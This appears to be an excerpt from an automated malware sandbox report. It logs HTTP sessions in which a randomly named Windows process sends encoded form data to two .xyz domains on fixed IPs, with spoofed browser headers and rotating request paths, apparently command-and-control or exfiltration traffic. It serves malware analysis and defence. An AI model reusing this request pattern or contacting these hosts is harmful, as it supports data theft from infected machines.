                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.64992785.159.66.9380768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:25.600266933 CET757OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 6f 59 63 45 46 71 32 56 6f 6a 46 32 41 2b 6b 39 74 4f 64 72 77 7a 68 79 38 7a 6c 6e 75 49 53 7a 6b 71 7a 47 6d 36 33 7a 54 57 49
                                                          Data Ascii: b6=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRooYcEFq2VojF2A+k9tOdrwzhy8zlnuISzkqzGm63zTWI


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.64993485.159.66.9380768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:28.268274069 CET781OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 54 6a 79 2b 72 58 6e 4f 49 34 78 6b 53 7a 55 78 32 51 38 6e 7a 72 77 79 6f 34 71 7a 5a 63 47 57 49 6a 43 75 56 45 75 4c 37 79 37 41 3d 3d
                                                          Data Ascii: b6=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gTjy+rXnOI4xkSzUx2Q8nzrwyo4qzZcGWIjCuVEuL7y7A==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.64994085.159.66.9380768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:30.941718102 CET1794OUTPOST /rum2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Origin: http://www.soainsaat.xyz
                                                          Referer: http://www.soainsaat.xyz/rum2/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 64 75 70 75 42 50 6c 79 5a 48 54 67 5a 77 6b 35 6c 47 59 48 67 71 2f 39 32 66 6c 2f 48 4d 75 6f 44 4d 46 51 47 45 64 45 61 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 37 4b 52 33 74 35 52 34 4f 46 36 2f 44 65 75 44 62 59 4f 38 45 32 45 4c 50 35 74 44 4a 51 69 67 4c 5a 74 69 4b 62 65 68 5a 52 79 75 39 49 4f 36 48 44 33 6c 34 6c 31 2b 32 54 37 78 71 50 58 74 45 76 45 41 64 79 4d 43 68 64 72 42 51 4d 68 41 42 48 41 67 [TRUNCATED]
                                                          Data Ascii: b6=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxdupuBPlyZHTgZwk5lGYHgq/92fl/HMuoDMFQGEdEatPvoKhgts7cAYkR+T5jEFTDkR64hjQqKz7KR3t5R4OF6/DeuDbYO8E2ELP5tDJQigLZtiKbehZRyu9IO6HD3l4l1+2T7xqPXtEvEAdyMChdrBQMhABHAgx5NE3XaBGoY+Ezyvd23/+3rgkuGOjTIDU9Rd/WkO/As61dTh9muS38CvwRchcktNBPZa+pUYpFEVOKP9F4s7ecoRg9+Ebbbq7dASpVALVbS7sIOEFbCedPk36dzYfAf3OdyPs/eaRKMhFf4kJJ4xHtPDjW6VPJEgZ8Ta0cKSrUS2OeQjVHiGOtTeZFnTW3YD+myRPC/CqJKEKQ4SQomfBJw19orfHYdPLPqqz7A6/7QYv5ngoUXvyJbNJVmRXqMADQSIwpez0MzAhpTSn6riJ/94qBhpCzSPb9qKjHgBbQS+Joc7oYzJT/BQEMoKl2iNUJLLvNYweFCT2fEWlkJr59QajgANxpeiam/C15YqCrSiBdmVvMHbSZ7m92826oNA8ogth0McaVOIA6NA5P59mSl+wQg4AMwxPxOpcOzoXeoY13+wsalRI8ssyLgG274S3ftKTIWeHj+2G+IQweXn4WNnGuCzjS7YVmOmmDrIv8rv5xibIzkJStzuQI1h/yQk3UJbdYdEHL/X+BJGNOM1Gfm8NDFfT355457tKkMtOeNHjok+8iNlETm6Csd+9RzVDKFA+1SRpz2diEyEv1f1bycptdWn8/Il/y9UZj3hzcxg23umNRDUiwR98iKl5879lyFLb/nDs3ow+hAKVpXJv0MZiUKuJY1YqS [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.64994785.159.66.9380768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:33.605660915 CET505OUTGET /rum2/?b6=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.soainsaat.xyz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:35.058809996 CET225INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.1
                                                          Date: Tue, 03 Dec 2024 22:28:34 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          X-Rate-Limit-Limit: 5s
                                                          X-Rate-Limit-Remaining: 19
                                                          X-Rate-Limit-Reset: 2024-12-03T22:28:39.8232335Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.649965185.27.134.14480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:40.744406939 CET751OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 5a 4a 74 5a 33 7a 4b 2f 72 38 71 7a 4a 37 4f 78 46 42 52 4e 57 51 31 56 6c 31 39 50 6f 47 34 45 54 6f 33 4c 63 77 32 44 6a 31 51
                                                          Data Ascii: b6=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtZJtZ3zK/r8qzJ7OxFBRNWQ1Vl19PoG4ETo3Lcw2Dj1Q
                                                          Dec 3, 2024 23:28:42.023236036 CET686INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:41 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.649970185.27.134.14480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:43.408987999 CET775OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 77 33 56 6e 74 50 50 49 47 53 47 54 51 33 5a 4c 38 52 4d 58 51 7a 44 58 65 48 48 49 44 53 59 70 73 4e 38 54 55 55 49 4d 71 73 69 41 3d 3d
                                                          Data Ascii: b6=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGw3VntPPIGSGTQ3ZL8RMXQzDXeHHIDSYpsN8TUUIMqsiA==
                                                          Dec 3, 2024 23:28:44.743237019 CET686INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:44 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.649977185.27.134.14480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:46.080183983 CET1788OUTPOST /d9ku/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Origin: http://www.amayavp.xyz
                                                          Referer: http://www.amayavp.xyz/d9ku/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6b 6f 71 4d 30 34 36 4a 67 5a 66 4c 4e 4b 64 4a 68 45 63 50 59 51 64 4d 6a 55 4c 64 78 69 2f 4f 62 4f 42 50 71 38 48 34 6d 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 33 6f 4f 62 4e 76 57 30 45 4d 68 74 49 2f 6b 30 59 76 55 2f 75 73 70 78 4b 66 38 7a 6b 75 33 78 5a 30 48 4c 37 63 47 4b 42 42 4f 43 67 50 67 45 52 4a 30 31 48 34 70 31 50 6f 68 72 35 44 50 69 63 30 35 57 6d 53 34 4d 6c 69 45 31 50 55 52 62 4e 77 4c 62 [TRUNCATED]
                                                          Data Ascii: b6=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoBM76bt+koqM046JgZfLNKdJhEcPYQdMjULdxi/ObOBPq8H4moFMdvG/Xfw7GxOKOnL44Tfyz0O2FuF9FI3oObNvW0EMhtI/k0YvU/uspxKf8zku3xZ0HL7cGKBBOCgPgERJ01H4p1Pohr5DPic05WmS4MliE1PURbNwLb4+v3luudp1eVm8Z+hBR1UA+Vx9kd0InlU/ubXsTFLsGfAfMxglHyP2JMGGAjbSEUn+Gp+q1dhzheBam1FM3/UNEjEtfYSd1DZe9HvvBbvnRYV68emK7nB9VqLXAWyIDdhBLS/2GGhN1j5iO/rfNTpNQq26shWS56sENSYNM+KNmCSLI4JJmRGRRezZab27LT98ZlzlA3haNOhdId0gvar0SR41ySZ8B1Ld5yV3btKTEhYesPoQFlM2TrILYlkuxrs5xzlmFDs2U5yxLrGqkUnXkUof1CKJi5UC02OJH6VllL7myyShso9sHboLnr2V/kAsaiBwnzCFYHuCcE+gUnYB2Cb5Xdf/+SZzqy98OyxFx6w/heolYXZA+cTUF5TevRl/IUFNM0XNDcyC7xKyA/Tdpkkf/9UTHFSGw4rdFfj5Eroa2HhAbRyb/JcXeYE3eW8hAOBLv0XUDUQ3BEextylIBbZySz69OTkRSnaUr/0niUaibxxdqFkoQuPfvVplkQdYjjESM1TBGhUw6tBTrpaYpaaQ7j4bbi7vuvQGFSFTITyma1CJuPfufUDGyMlTVZ+SW0x+enjN4jcHbY7Dk5suAdzPT5jWj8r9kcRHNjSkwa3TZcPRc3meejHttt8OuPYi25a4WyZL5oXudsjmLh+ms7hcTU33jwHk [TRUNCATED]
                                                          Dec 3, 2024 23:28:47.367964983 CET686INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:47 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Content-Encoding: br
                                                          Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff 2f a7 a7 2b 8f 4e c2 0b 89 43 20 e9 cf cc 4f eb 6d 8a 55 44 06 ce 89 3a d1 a9 46 36 f8 66 c9 89 03 9e 50 ff 5a 61 76 b0 83 de e6 1a 3d fb 13 a4 1e 1c 73 6b 24 72 4a 02 53 9f f4 50 ab 56 c0 4f 2a 8e 67 d8 8c 94 5b 84 fd 05 46 75 33 ba 31 57 be 1e 4b 59 4e 30 72 16 9e 05 38 e5 e0 eb a7 b2 71 c8 44 5e 18 92 a8 43 9d 20 53 c6 85 03 87 25 6d 69 c2 09 39 41 dc 77 a7 21 12 cf 6e eb 91 03 5c 47 2c 7c fd 50 0b 09 c0 aa d1 b2 ae 5f 5c 68 a1 ec 2f fd 3d fd 8b c9 1c e0 66 3e 57 bb 2b 1b be 54 ec 53 07 18 d3 36 c4 55 bb 69 df 77 79 d5 f6 7d e2 7c f0 12 5e db af f6 cf 15 8e 71 89 31 f1 2f 2e 24 d0 c0 4b f8 b4 cb d1 90 c8 69 be 3d 05 00 fd 07 6e 73 c6 b4 92 36 96 2a 49 52 9b 4b 2e 0c cf 58 21 ad 66 32 d6 39 26 54 fb bc 2d 45 96 e7 26 75 ce 09 6e 32 29 73 21 63 26 53 26 98 ce 65 5b c4 02 32 53 9a 19 91 f2 42 9b 94 c9 29 42 b6 8b b8 c8 2d 2b 4c 6e 53 a7 4d 9a 48 5c d9 89 59 36 ba 03 d8 02 fc f7 b7 74 8b 25 60 1f 69 88 60 f7 df 3c 7c 86 d6 99 f9 6e ba f4 0c 4d a9 a2 9a 10 1f 57 28 33 [TRUNCATED]
                                                          Data Ascii: 1bc /+NC OmUD:F6fPZav=sk$rJSPVO*g[Fu31WKYN0r8qD^C S%mi9Aw!n\G,|P_\h/=f>W+TS6Uiwy}|^q1/.$Ki=ns6*IRK.X!f29&T-E&un2)s!c&S&e[2SB)B-+LnSMH\Y6t%`i`<|nMW(3?VwEQYdd=}*}N4Ut(9/khPD`dMh"WeJsFiF|#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.649983185.27.134.14480768C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 23:28:48.866777897 CET503OUTGET /d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.amayavp.xyz
                                                          Connection: close
